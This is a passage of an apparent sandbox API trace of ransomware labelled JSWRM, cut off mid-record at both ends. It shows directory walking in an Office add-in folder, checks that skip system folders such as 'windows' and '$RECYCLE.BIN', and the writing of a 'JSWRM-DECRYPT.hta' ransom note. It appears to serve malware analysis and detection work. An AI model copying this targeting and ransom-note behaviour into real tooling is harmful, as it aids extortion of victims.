CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.449] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.449] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6d2a978, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6d2a978, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6d50bdc, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x36aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.450] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.450] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.450] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.450] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.450] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.450] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.450] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.450] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.450] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.450] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d298, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.450] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4692737, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4692737, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4692737, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x96aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.450] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.450] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.450] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.450] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.450] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.450] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.450] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.450] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.450] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.450] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.450] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.451] FindNextFileW (in: hFindFile=0x232140, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4692737, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4692737, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4692737, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x96aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0123.451] FindClose (in: hFindFile=0x232140 | out: hFindFile=0x232140) returned 1 [0123.451] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e56af1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x680214, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x680214, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="zh-HANS", cAlternateFileName="")) returned 1 [0123.451] lstrcmpiW (lpString1="zh-HANS", lpString2=".") returned 1 [0123.451] lstrcmpiW (lpString1="zh-HANS", lpString2="..") returned 1 [0123.451] lstrcmpiW (lpString1="zh-HANS", lpString2="...") returned 1 [0123.451] lstrcmpiW (lpString1="zh-HANS", lpString2="windows") returned 1 [0123.451] lstrcmpiW (lpString1="zh-HANS", lpString2="recovery") returned 1 [0123.451] lstrcmpiW (lpString1="zh-HANS", lpString2="perflogs") returned 1 [0123.451] lstrcmpiW (lpString1="zh-HANS", lpString2="documents and settings") returned 1 [0123.451] lstrcmpiW (lpString1="zh-HANS", lpString2="$RECYCLE.BIN") returned 1 [0123.451] lstrcmpiW (lpString1="zh-HANS", lpString2="system volume information") returned 1 [0123.451] lstrcmpiW (lpString1="zh-HANS", lpString2="msocache") returned 1 [0123.451] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\zh-HANS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\zh-hans\\jswrm-decrypt.hta")) returned 0xffffffff [0123.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.452] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\zh-HANS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\zh-hans\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.453] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.453] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.454] CloseHandle (hObject=0x338) returned 1 [0123.454] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\zh-HANS\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\zh-hans\\jswrm-decrypt.hta")) returned 0x20 [0123.454] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\zh-HANS\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e56af1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x680214, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x403fcb60, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0123.455] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.455] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e56af1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x680214, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x403fcb60, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.455] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.455] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.455] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x403fcb60, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x403fcb60, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x403fcb60, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.455] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.455] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.455] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.455] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.455] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.455] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.455] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.455] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.455] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.455] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.455] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.455] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf9992797, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf9992797, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf99b89f6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xe040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.455] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.455] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.455] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.455] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="windows") returned -1 [0123.455] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="recovery") returned -1 [0123.455] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="perflogs") returned -1 [0123.455] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="documents and settings") returned 1 [0123.455] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.455] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="system volume information") returned -1 [0123.455] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="msocache") returned -1 [0123.456] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.456] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.456] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.456] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0d8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.456] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1e56af1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1e56af1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf21ea38b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x23aa8, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0123.456] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.456] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.456] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.456] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.456] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.456] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.456] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.456] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.456] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.456] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.456] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.456] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22ce70, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.456] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.456] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22cdc8, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.456] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4692737, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4692737, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4692737, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2f040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.456] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.456] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.456] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.456] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.456] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.456] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.456] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.456] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.456] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.457] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22d260, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.457] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x680214, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x680214, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x680214, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7e040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.457] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.457] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.457] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.457] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.457] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.457] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.457] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.457] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.457] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.457] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.457] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 